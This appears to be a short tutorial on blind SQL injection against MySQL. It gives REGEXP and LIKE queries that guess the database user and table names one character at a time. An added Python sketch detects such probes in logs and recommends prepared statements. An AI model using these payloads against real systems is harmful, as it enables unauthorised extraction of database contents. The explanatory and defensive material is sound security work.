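Using REGEXP for injection

REGEXP returns 1 when the pattern matches and 0 otherwise.

This statement returns 1 when the current user starts with root:
SELECT USER() REGEXP '^root';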

Guessing user()

select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp '^ri');

Guessing table names

select * from users where id=1 and 1=(select 1 from information_schema.tables
where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);

The following statement returns 1 if a match is found; otherwise it returns an empty result:

select 1 from information_schema.tables
where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1;

Another approach

LIKE can be used for injection in the same way:

SELECT USER() LIKE "%ros%";

It returns 1 on a match and 0 otherwise.
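
A defender's view of the probes above, as an added example that is not part of the original page: a Python sketch that scans logged values of the id parameter for REGEXP/LIKE comparisons and flags clients that send repeated anchored guesses. The log tuples, IP addresses, function names and the threshold of 3 are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: (client_ip, value of the id parameter) as a web or WAF log might record it.
SAMPLE_LOG = [
    ("203.0.113.7", "1 and 1=(if((user() regexp '^r'),1,0))"),
    ("203.0.113.7", "1 and 1=(user() regexp'^ri')"),
    ("203.0.113.7", "1 and 1=(select 1 from information_schema.tables "
                    "where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1)"),
    ("198.51.100.4", "1"),
    ("198.51.100.9", "1 and user() like \"%ros%\""),
]

# REGEXP/RLIKE/LIKE followed by a quoted pattern; a numeric id should never contain one.
PROBE = re.compile(r"""\b(regexp|rlike|like)\s*(['"])(.*?)\2""", re.I)
# What the page's statements compare against: user() and information_schema tables.
TARGET = re.compile(r"\b(user\s*\(\s*\)|information_schema\.\w+)", re.I)

def find_probes(value):
    """Return (operator, pattern) pairs found in one parameter value."""
    return [(m.group(1).lower(), m.group(3)) for m in PROBE.finditer(value)]

def summarize(log):
    """Group probes per client and flag clients sending repeated anchored guesses."""
    per_client = defaultdict(lambda: {"patterns": [], "targets": set()})
    for ip, value in log:
        probes = find_probes(value)
        if not probes:
            continue  # plain integer ids and other benign values are ignored
        entry = per_client[ip]
        entry["patterns"] += [p for _, p in probes]
        entry["targets"] |= {t.lower().replace(" ", "") for t in TARGET.findall(value)}
    report = {}
    for ip, entry in per_client.items():
        anchored = [p for p in entry["patterns"] if p.startswith("^")]
        report[ip] = {
            "probes": len(entry["patterns"]),
            "anchored_guesses": len(anchored),
            "targets": sorted(entry["targets"]),
            "enumerating": len(anchored) >= 3,  # threshold is an assumption
        }
    return report
```

Any hit at all on an integer parameter is worth alerting on; the durable fix is to bind id as a parameter in a prepared statement so the comparison never reaches the SQL parser.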